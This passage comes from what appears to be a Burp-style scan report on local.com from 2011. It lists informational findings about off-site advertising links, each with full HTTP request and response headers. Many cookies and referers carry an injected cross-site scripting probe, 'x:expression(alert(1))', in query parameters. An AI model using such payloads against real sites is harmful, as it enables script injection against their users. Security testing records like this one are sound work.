Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 840
Date: Thu, 03 Feb 2011 16:01:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748883062?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748883062?" border="0" alt="" /></a>
...[SNIP]...

8.31. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748870273&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1296748870273?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1296748870273?

Request

GET /dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748870273&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/equity-bank-63975058/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 840
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:03 GMT
Connection: close
Content-Length: 840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1296748870273?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1296748870273?" border="0" alt="" /></a>
...[SNIP]...

8.32. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748848750&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748848750?
http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748848750?

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748848750&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.2.10.1296748820; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 978
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:27 GMT
Connection: close
Content-Length: 978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748848750?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748848750?" border="0" alt="" /></a>
...[SNIP]...

8.33. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=4;tile=4;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?
http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=4;tile=4;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; session_start_time=1296748820317; k_visit=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 978
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 15:59:58 GMT
Connection: close
Content-Length: 978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=4;tile=4;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=4;tile=4;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?" border="0" alt="" /></a>
...[SNIP]...

8.34. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748830841&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=4;tile=4;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748830841?
http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=4;tile=4;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748830841?

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748830841&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f%22style%3d%22x%3aexpression(alert(1))%22fccc9411126
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.1.10.1296748820; __qca=P0-30084348-1296748820628; ASP.NET_SessionId=en03gt2mbtrg5hymvlucfg2l; localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=41e9b545-7b15-424c-972c-65baecb81534&expdate=634349085968705455&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_jsa134f%22style%253d%22x%253aexpression(alert(1))%22fccc9411126&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506&exp=634323183968705455

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 978
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:09 GMT
Connection: close
Content-Length: 978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=4;tile=4;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748830841?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=4;tile=4;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748830841?" border="0" alt="" /></a>
...[SNIP]...

8.35. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&sz=491x223&ord=1296748869864&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748869864?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748869864?

Request

GET /dart/?ag=True&p=locm.pp&sz=491x223&ord=1296748869864&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748869864?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748869864?" border="0" alt="" /></a>
...[SNIP]...

8.36. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.sp&sz=491x223&ord=1296748830841&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748830841?
http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748830841?

Request

GET /dart/?ag=True&p=locm.sp&sz=491x223&ord=1296748830841&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f%22style%3d%22x%3aexpression(alert(1))%22fccc9411126
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.1.10.1296748820; __qca=P0-30084348-1296748820628; ASP.NET_SessionId=en03gt2mbtrg5hymvlucfg2l; localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=41e9b545-7b15-424c-972c-65baecb81534&expdate=634349085968705455&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_jsa134f%22style%253d%22x%253aexpression(alert(1))%22fccc9411126&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506&exp=634323183968705455

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:09 GMT
Connection: close
Content-Length: 834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748830841?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=491x223;ord=1296748830841?" border="0" alt="" /></a>
...[SNIP]...

8.37. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&p=locm.pp&pos=8&t=8&sz=310x101&ord=1296748884962&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748884962?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748884962?

Request

GET /dart/?ag=True&p=locm.pp&pos=8&t=8&sz=310x101&ord=1296748884962&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 840
Date: Thu, 03 Feb 2011 16:01:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748884962?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8;city=dallas_tx;sz=310x101;ord=1296748884962?" border="0" alt="" /></a>
...[SNIP]...

8.38. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&css=banner&p=locm.pp&pos=1&t=1&sz=728x90&ord=1296748869864&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748869864?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748869864?

Request

GET /dart/?ag=True&css=banner&p=locm.pp&pos=1&t=1&sz=728x90&ord=1296748869864&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
